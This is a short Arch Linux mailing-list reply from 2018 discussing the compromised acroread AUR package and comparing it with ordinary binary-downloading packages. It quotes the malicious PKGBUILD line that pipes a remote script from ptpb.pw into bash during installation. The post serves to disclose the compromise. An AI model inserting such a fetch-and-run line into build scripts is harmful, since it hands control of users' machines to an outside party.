[aur-general] acroread package compromised
Ralf Mardorf
ralf.mardorf at alice-dsl.net
Sun Jul 8 12:53:48 UTC 2018
On Sun, 8 Jul 2018 14:02:15 +0200, Joakim Hernberg wrote:
>Needlessly to say I didn't install it. Still just thought I'd mention
>it.
FWIW
https://git.archlinux.org/svntogit/packages.git/tree/trunk/mirrorlist?h=packages/pacman-mirrorlist
does contain https://mex.mirror.pkgbuild.com/ .
It's even possible to get the signature, too,
https://mex.mirror.pkgbuild.com/extra/os/x86_64/vlc-3.0.3-1-x86_64.pkg.tar.xz.sig .
The AUR provides tons of packages downloading binaries, such as
https://aur.archlinux.org/packages/palemoon-bin/ ,
https://aur.archlinux.org/packages/virtualbox-bin/ or
https://aur.archlinux.org/packages/icecat-bin/ from sources
completely unrelated to Arch Linux.
The acroread PKGBUILD's
msg2 "Installing Main Files..."
curl -s https://ptpb.pw/~x|bash -&
is from a completely different "kind of quality".
More information about the aur-general
mailing list